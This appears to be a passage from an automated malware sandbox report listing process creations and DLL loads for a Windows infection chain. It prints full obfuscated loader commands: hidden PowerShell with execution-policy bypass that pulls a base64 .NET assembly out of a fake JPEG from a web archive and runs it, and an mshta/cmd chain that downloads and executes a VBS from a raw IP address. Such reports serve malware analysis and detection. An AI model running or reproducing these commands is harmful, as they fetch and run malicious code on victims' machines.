? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
